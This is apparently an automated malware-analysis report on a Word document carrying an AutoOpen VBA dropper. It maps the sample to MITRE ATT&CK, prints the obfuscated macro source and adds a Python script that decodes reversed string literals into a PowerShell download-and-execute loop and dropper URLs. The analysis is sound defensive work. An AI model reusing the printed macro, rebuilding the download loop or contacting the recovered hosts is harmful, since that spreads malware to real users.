Verdict: MALICIOUS
Risk score: 202

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1566.001 Phishing: Spearphishing Attachment
The sample is a malicious Word (OLE) document carrying a VBA project with an AutoOpen subroutine, so the macro runs as soon as a user opens the file and allows macros. The macro source contains a Shell() call, flagged as a critical heuristic, which gives it the ability to run an arbitrary command line. In the extracted macros.bas, AutoOpen passes a string assembled by the function PTuKDuUFHvsZYw to QpBsoXROUR (whose body is not in the preview); PTuKDuUFHvsZYw builds that string from chunked, reversed literals (for example "ptth" for "http") through the helper YdLISj, and the whole project is padded with junk arithmetic on undefined variables and dead assignments to defeat signature matching. ClamAV's detection of the file as Doc.Dropper.Agent-6543493-0 is consistent with this behaviour: the macro's intent is to download and execute a second-stage payload, which is characteristic of a dropper.
Heuristics (6)

- ClamAV: Doc.Dropper.Agent-6543493-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware, signature Doc.Dropper.Agent-6543493-0.
- VBA macros detected [medium, OLE_VBA_MACROS, 2 related findings]: the document contains VBA macro code.
- Shell() call in VBA [critical, OLE_VBA_SHELL]: the macro source contains a Shell() call, i.e. the ability to execute an arbitrary command line from the document.
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: an AutoOpen subroutine is present, so the macro runs on document open once macros are enabled, with no further user interaction.
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: the OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, and no stronger macro-virus family marker was present. This heuristic's boilerplate ("no modern VBA project was recovered") does not apply to this sample, whose VBA project was extracted as macros.bas; treat the marker as overlapping evidence for the AutoOpen finding, not as an independent downloader or parser-CVE attribution.
- Embedded URL [info, EMBEDDED_URL]: http://schemas.openxmlformats.org/drawingml/2006/main, found in the document text (OLE body). The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. This particular URL is the DrawingML XML namespace identifier that any Office document with drawing content carries and is not an indicator of compromise.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 117706 bytes | ce55d58c505545c3e536f0ed641f937ab0cfc19e55b19a83d7f609d487ca4f0a |
Preview: first 1,000 lines of the extracted script (macros.bas)
Attribute VB_Name = "cmUhwBz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub FrFdqX(ZzUjD)
dDbUsO = SaIMPN + Sgn(90074 - rmjjQ - SEjLO + Fix(45471)) - 31249 - CDbl(71987)
TvEafP = Xspmj
jtOcdz = LoDmvL
rJirLj = 69435
End Sub
Sub RKnPzh(nqiUn)
pzmuQ = iisRf + Sgn(37904 - SOOwb - vucDpN + Fix(513)) - 714 - CDbl(94637)
NIaYd = Mrwud
KYtIw = PzZrCU
aNtwhQ = 6563
diIEvm = CWBjW + Sgn(81002 - DKjRRl - cVGGjD + Fix(77088)) - 36227 - CDbl(90297)
iZXhu = EAvwwC
VzBrKi = PwSkB
CzOjc = 68721
mCwSCJ = cQVmAZ + Sgn(60265 - JiLdki - fHnfki + Fix(12811)) - 72606 - CDbl(23018)
NaDTA = pBIozc
jbiRok = wzzmX
fWYrVi = 18849
End Sub
Sub nwbRI(WbbqAC)
EDFQSB = XNdQwL + Sgn(6713 - cQSUT - vdCAj + Fix(77343)) - 3734 - CDbl(43984)
GmUMb = SaDdW
ZULVzs = zLXfj
IaDQm = 25857
AqXdbw = AJpPrz + Sgn(42610 - Iriiv - XMiGkz + Fix(36373)) - 84591 - CDbl(29565)
RPksj = htwQDp
Iomrm = MlDRn
ioWqzJ = 15542
End Sub
Sub Autoopen()
On Error Resume Next
fzbMdm = Jlkfu + Sgn(65604 - aSwIjZ - YOwwP + Fix(10225)) - 18464 - CDbl(19873)
zHvup = NZNAI
ATmsu = OEsqci
GjdPOh = 1344
QpBsoXROUR (ikYznA + PTuKDuUFHvsZYw + FYufR)
YuMEU = vFKIi + Sgn(24601 - jbjJw - HCRiN + Fix(86744)) - 15068 - CDbl(73725)
zTvzRq = oRLuPF
XbumjR = VOwMJw
LwLMf = 92413
End Sub
Sub rMhvN(nSwDE)
IuHTG = UMdEz + Sgn(70152 - rbcSA - jJnjON + Fix(83271)) - 42316 - CDbl(33177)
DQsIHp = EfEnL
cmNwnV = KzwVU
VNsFPC = 5984
aoGcA = PYnvu + Sgn(46352 - KtBQD - spDRW + Fix(75660)) - 27634 - CDbl(38994)
LZplIX = wGUnT
mMDbw = LTrpL
KWXWj = 78599
iQMNFI = BHvuw + Sgn(32065 - iCqOvq - JiUkij + Fix(94658)) - 1064 - CDbl(60715)
WfBlta = zSjRDY
suUcUj = owrYl
dbZSBc = 39615
End Sub
Sub QPwoc(RdJdGG)
sjPUj = TihJMH + Sgn(65335 - WtOQb - YbfYo + Fix(83610)) - 77468 - CDbl(83015)
oOSiV = rKwUcB
jFjjuW = jvMfDw
EqjoL = 53623
End Sub
Attribute VB_Name = "svtdMkijPv"
Sub BirZoH(SwbtBn)
WUnTRf = ZSrKq + Sgn(7024 - lQAfRj - PYfCZ + Fix(84897)) - 86299 - CDbl(60770)
zuFBqQ = QwPjcP
OwDPj = aNkGZH
IQsnYu = 45095
End Sub
Function PTuKDuUFHvsZYw()
On Error Resume Next
QkBrVZ = hBAZzY + Sgn(31620 - VdLzU - KzbiTi + Fix(98887)) - 10874 - CDbl(52982)
isIwO = XLGqj
GAHYrM = KMuCG
lZIBq = 71092
rkoWa = SzHPEf + Sgn(49639 - suqQm - SNAwu + Fix(90416)) - 89782 - CDbl(95718)
UXoaE = iRhSzC
LXurAU = CmOqR
ijqcfl = 40322
jjsVi = YdLISj("sLp'.cf'+'sapXd(sJ'+'Oe'+'l'+'Tp8'+'IFda'+'OTp8lnWT'+'p8oDsJ'+'O.UYYpXd{yrt'+'{)XC'+'D'+'Ap'+'Xd ni cfsapXdhNRNNi", 24460 + 7 - 24460, 24460 + 104 - 24460)
mrQFVl = cJznJ + Sgn(38008 - dDCuZ - IiJzIN + Fix(2674)) - 99735 - CDbl(52607)
nOhMZ = imijEa
QDHWdF = ZkLkdE
SwIjJB = 7985
hhsoV = mvEnf + Sgn(23637 - wIAsu - wjbfT + Fix(73173)) - 36772 - CDbl(7683)
Zrpil = Zomjl
cioCGw = nGVhba
lGCYCC = 7733
PObsor = YdLISj("LuJ'+'924//:ptth@/'+'ANO'+'Pyj7/u'+'a.mo'+'c.re'+'zagnus/'+'/'+':ptth@'+'/y'+'Dzb23'+'ep/k'+'u.o'+'c'+'.in'+'imh'+'sittoc'+'s/'+'/:ptth'+' POu'+' ='+' XCD'+'A'+'p'+'Xd;)331'+'2fpr,v", 19813 + 6 - 19813, 19813 + 173 - 19813)
VNzAaz = TNJIT + Sgn(42385 - ncMpn - EEJOE + Fix(16584)) - 32450 - CDbl(38339)
NjjmAI = EGViOm
YTGGj = ZMNOn
REjvS = 62978
XXDfM = EFkKmp + Sgn(87076 - iSwJiF - tjdnaz + Fix(91361)) - 19636 - CDbl(15711)
jtSVi = Yjcznc
DLiXWb = nvFXd
ZrlnJv = 54604
HOwTYSKjF = YdLISj("s%pp15]rAHC[( eCALpER-)'}}{h'+'cta'+'c'+'};'+'k'+'aerb'+';'+')CD'+'SpXd'+'()POum'+'et'+'I-eP'+'Ou+'+'P'+'OukPOu+P'+'Ouo'+'vnIPO'+'u(&;)CDSpXd ,)'+'('+'sJO'+'gN'+'Tp8'+'iTp8'+'rtSo'+'Ts'+'J'+'O'+3zNc", 9409 + 5 - 9409, 9409 + 191 - 9409)
CvbXw = YZBGEQ + Sgn(5271 - cwcZis - nourr + Fix(23209)) - 62674 - CDbl(95520)
pszTAQ = zZvqN
zTNnwP = KkMjwP
jjFUr = 53843
pONzVG = aPpRPS + Sgn(38125 - SzYbv - hwXWFM + Fix(57372)) - 66793 - CDbl(17346)
lUDRL = kpZRl
NGuMsf = NjsmFH
pbPtF = 84423
oMRiVALHnPb = YdLISj("BtJX)''nioJ-]52,62,4[cepsMoC:vNE$ (& |)69]rAHC[,)48]rAHC[+211]rAHC[+65w1JB", 24360 + 5 - 243
... (truncated)
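The obfuscation visible in PTuKDuUFHvsZYw can be undone without executing the macro. The literals handed to YdLISj are split into chunks with `'+'` seams and stored reversed (the tokens `ptth`, `rAHC` and `eCALpER` are `http`, `CHAr` and `REpLACe` backwards), and every numeric argument is the pattern A + n - A. The following Python script is an added example written for this report, not code from the analyzer or from the sample: it takes the three complete YdLISj literals and their numeric argument lists exactly as they appear in the preview above, folds the arithmetic, strips the seams, reverses the text and pulls out URL-like strings. The body of YdLISj is not in the preview, so the meaning of the folded numbers (probably a start/length pair) is an assumption and the script does not slice with them; the placeholder tokens left in the output (dXp, uOP, OJs, 8pT) appear to be substituted by the `-REpLACe` stage that the third fragment shows, and that substitution is not attempted here.

```python
"""Deobfuscate the YdLISj() string literals from the extracted macro.

Added example for this report; not code from the analyzer or from the
sample. Input literals are copied verbatim from the macros.bas preview.
"""
import re

# The three complete string arguments handed to YdLISj() in the preview
# (the fourth call is truncated on the page and is left out).
YDLISJ_LITERALS = [
    "sLp'.cf'+'sapXd(sJ'+'Oe'+'l'+'Tp8'+'IFda'+'OTp8lnWT'+'p8oDsJ'+'O.UYYpXd{yrt'+'{)XC'+'D'+'Ap'+'Xd ni cfsapXdhNRNNi",
    "LuJ'+'924//:ptth@/'+'ANO'+'Pyj7/u'+'a.mo'+'c.re'+'zagnus/'+'/'+':ptth@'+'/y'+'Dzb23'+'ep/k'+'u.o'+'c'+'.in'+'imh'+'sittoc'+'s/'+'/:ptth'+' POu'+' ='+' XCD'+'A'+'p'+'Xd;)331'+'2fpr,v",
    "s%pp15]rAHC[( eCALpER-)'}}{h'+'cta'+'c'+'};'+'k'+'aerb'+';'+')CD'+'SpXd'+'()POum'+'et'+'I-eP'+'Ou+'+'P'+'OukPOu+P'+'Ouo'+'vnIPO'+'u(&;)CDSpXd ,)'+'('+'sJO'+'gN'+'Tp8'+'iTp8'+'rtSo'+'Ts'+'J'+'O'+3zNc",
]

# The numeric arguments of the same three calls, verbatim from the preview.
YDLISJ_NUMERIC_ARGS = [
    "24460 + 7 - 24460, 24460 + 104 - 24460",
    "19813 + 6 - 19813, 19813 + 173 - 19813",
    "9409 + 5 - 9409, 9409 + 191 - 9409",
]

# Every numeric argument follows "A + n - A"; only n carries information.
ARITH = re.compile(r"^\s*(\d+)\s*\+\s*(\d+)\s*-\s*(\d+)\s*$")


def fold_arith(expr):
    """Evaluate one 'A + n - B' expression without eval(); reject anything else."""
    m = ARITH.match(expr)
    if not m:
        raise ValueError("unexpected numeric expression: %r" % expr)
    a, n, b = (int(g) for g in m.groups())
    return a + n - b


def fold_args(arglist):
    """Fold a comma-separated argument list such as '24460 + 7 - 24460, ...'."""
    return tuple(fold_arith(part) for part in arglist.split(","))


def unchunk(literal):
    """Drop the "'+'" seams the builder inserted between string chunks."""
    return literal.replace("'+'", "")


def deobfuscate(literal):
    """Unchunk, then reverse: 'ptth' and 'rAHC' show the text is stored backwards."""
    return unchunk(literal)[::-1]


# http(s):// up to whitespace, a quote, or the '@' the sample uses as a list separator.
URL_RE = re.compile(r"https?://[^\s'\"@]+")


def extract_urls(text):
    """Return URL-like substrings of a recovered fragment."""
    return URL_RE.findall(text)


def analyze():
    """Return folded numeric args, recovered fragments and URL-like strings."""
    fragments = [deobfuscate(s) for s in YDLISJ_LITERALS]
    return {
        "numeric_args": [fold_args(a) for a in YDLISJ_NUMERIC_ARGS],
        "fragments": fragments,
        "urls": [u for f in fragments for u in extract_urls(f)],
    }


if __name__ == "__main__":
    result = analyze()
    for args, frag in zip(result["numeric_args"], result["fragments"]):
        print("YdLISj(..., %d, %d) ->" % args)
        print("   ", frag)
    print("URL-like strings (indicators, do not fetch):")
    for u in result["urls"]:
        print("   ", u)
```

Run as-is, the script prints three fragments that read as one PowerShell download loop once the placeholders are mentally substituted: an iteration over `$asfc in $ADCX` inside `try{`, a `"Do"+"Wnl"+"OadFI"+"le"` method call chunked with placeholder joins, `'Invo'+'k'+'e-Item'` on the downloaded file, then `break;}catch{}}`, with `$ADCX` assigned from an `@`-separated URL list. Two complete URLs come out of the second fragment; the third match (`http://429JuL`) is the tail of a chunk, not a full URL. Treat the recovered hosts as indicators to search for in proxy and DNS logs, not as addresses to visit.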